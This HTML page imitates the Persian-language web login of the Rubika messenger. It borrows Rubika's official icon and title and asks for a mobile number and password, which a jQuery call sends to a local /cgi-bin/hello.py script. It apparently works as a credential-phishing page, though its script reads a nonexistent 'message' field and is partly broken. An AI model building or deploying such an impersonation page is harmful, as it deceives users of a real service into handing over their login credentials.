<html>
        <head>
    <meta charset="utf-8">
    <link rel="icon" type="image/x-icon" href="https://s6.uupload.ir/files/polish_20220915_135553463_xenp.png" />
    <title>پیام رسان وب روبیکا</title>
    <script src="http://code.jquery.com/jquery-3.3.1.js"></script>
    <script>
        function test()
        {
            var message = $('input[name=message]').val();
            $.ajax({
                url: "/cgi-bin/hello.py",
                type: "POST",
                data: {"text" : message},
                success: function(response){
                        $("#div").html(response);
                }
            });
        };

    </script>
    <body>
        <style>
            body{
                text-align: center;
                background: #ffffff;
            }
            img{
                width: 160px;
                margin-top: 5%;
            }
            .input{
                margin-top: 1%;
                width: 300px;
                height: 50px;
                padding: 10px;
                background: #ffffff;
                border-radius: 10px;
                outline: none;
                color: #000000;
                border: 1px solid #3390ec;
            }
            .placeholder{
                color: #3390ec;
                background: #ffffff;
                top: 10px;
                left: 660px;
                font-size: 14px;
                position: absolute;
            }
            .input-group{
                position: relative;
            }
            .input:focus + .placeholder,.input:not(:placeholder-shown) + .placeholder{
                background-color: #ffffff;
            }
            .hip{
                width: 300px;
                height: 50px;
                margin-top: 1%;
                padding: 10px;
                background: #ffffff;
                border-radius: 10px;
                outline: none;
                color: #000000;
                border: 1px solid rgba(99, 99, 100, 0.933);
            }
            .lop{
                color: #000000;
                background: #ffffff;
                top: 370px;
                left: 670px;
                font-size: 14px;
                position: absolute;
            }
            .select-group{
                position: relative;
            }
            .select:focus + .lop,.select:not(:lop-shown) + .lop{
                background-color: #ffffff;
            }
            button{
                border: 0px;
                padding: 10px 10px;
                width: 300px;
                height: 50px;
                font-size: 20px;
                margin-top: 1%;
                border-radius: 10px;
                background: #3390ec;
                color: #fff;
            }
            h4{
              margin-top: 1%;
              font-size: 18px;  
              color:#3390ec;
            }
        </style>
        <form>
        <img src="https://web.rubika.ir/assets/icons/icon-192x192.png"/>
        <h1>ورود</h1>
        <p>لطفا کشور خود را انتخاب کنید و شماره همراه خود را به صورت کامل وارد کنید.</p>
        <label class="lop">کشور</label>
        <select class="hip">
        <option value="volvo">ایران</option>
        </select>
<div class="input-group" for='fname'>
    <input type="tel" class="input" placeholder="+98" name="tel"/>
    <label class="placeholder">شماره همراه</label>
    <div class="input-group" for='fname'>
        <input type="password" class="input" placeholder="" name="password"/>
        <label class="placeholder">گذر واژه شما</label>
    </div>
</div>
<button onclick="test()">بعدی</button>
<h4>گذر واژه خود را فراموش کردید؟</h4>
</form>
    </body>
</head>
</html>